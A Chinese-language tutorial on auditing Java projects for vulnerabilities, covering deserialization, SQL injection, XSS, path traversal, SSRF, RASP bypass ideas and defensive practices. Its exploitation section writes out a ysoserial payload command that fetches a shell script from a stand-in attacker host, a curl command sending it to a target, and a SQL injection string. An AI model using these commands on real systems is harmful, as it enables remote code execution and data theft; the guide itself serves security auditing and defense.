Java项目漏洞挖掘实战指南

一、漏洞挖掘前期准备

1. 环境搭建

   • 安装Java开发环境(JDK 8/11/17)
   • 配置Maven或Gradle构建工具
   • 准备调试工具(IntelliJ IDEA/Eclipse + 调试插件)
   • 安装反编译工具(JADX、JD-GUI、CFR)

2. 目标分析

   • 确定项目架构(Spring Boot/Struts2/传统Servlet)
   • 识别使用的第三方库和框架版本
   • 分析项目部署方式(WAR包/独立JAR/Docker容器)

二、常见Java漏洞类型及挖掘方法

1. 反序列化漏洞

• 识别点：查找ObjectInputStream、readObject()、readResolve()等方法调用
• 利用链构建：
  • Commons Collections链(3.1-3.2.1)
  • JDK原生链(7u21)
  • Groovy链
  • Jython链
• 检测工具：ysoserial、marshalsec

2. SQL注入

• 传统JDBC检测：

  String sql = "SELECT * FROM users WHERE id = " + userInput; // 危险
  

• ORM框架检测：
  • Hibernate: 检查.createSQLQuery()是否使用参数绑定
  • MyBatis: 检查${}占位符使用情况

3. XSS漏洞

• 输出点检测：
  • JSP中的<%= %>未转义输出
  • Thymeleaf/Freemarker未使用安全输出方式
  • 检查HttpServletResponse直接输出用户输入

4. 文件操作漏洞

• 路径遍历检测：

  File file = new File("/var/www/uploads/" + userInput); // 危险
  

• 文件上传检测：
  • 检查文件类型验证是否可绕过
  • 检查临时文件是否可预测路径

5. SSRF漏洞

• 检测点：
  • URLConnection/HttpClient使用用户可控URL
  • 检查DNS解析是否可控

三、高级审计技巧

1. 字节码分析

   • 使用ASM分析类文件
   • 动态修改字节码进行漏洞验证

2. 动态调试

   • 远程调试Java应用
   • 条件断点设置技巧
   • 内存dump分析

3. RASP绕过

   • 反射调用黑名单检测
   • 类加载器隔离技术
   • 原生方法调用

四、漏洞利用实战

1. 反序列化漏洞利用示例

// 生成CommonsCollections5 payload
java -jar ysoserial.jar CommonsCollections5 "curl http://attacker.com/shell.sh" > payload.bin

// 发送payload
curl -X POST --data-binary @payload.bin http://target.com/vuln-endpoint

2. SQL注入利用示例

// 原始漏洞代码
String query = "SELECT * FROM users WHERE username = '" + username + "'";

// 利用方式
username = "' OR '1'='1' -- ";

五、防御建议

1. 安全编码实践

   • 使用预编译语句
   • 实施输入验证和输出编码
   • 禁用危险功能(如Runtime.exec)

2. 安全配置

   • 关闭调试模式
   • 限制反序列化白名单
   • 配置安全HTTP头

3. 安全工具

   • 使用OWASP Dependency-Check检查依赖漏洞
   • 部署WAF和RASP防护

六、参考资源

1. 工具集合

   • OWASP ZAP
   • Burp Suite
   • FindSecBugs

2. 学习资料

   • 《Java安全编码标准》
   • OWASP Top 10
   • Java安全公告列表

通过系统性地应用这些技术和方法，可以有效发现和修复Java项目中的安全漏洞，提升应用安全性。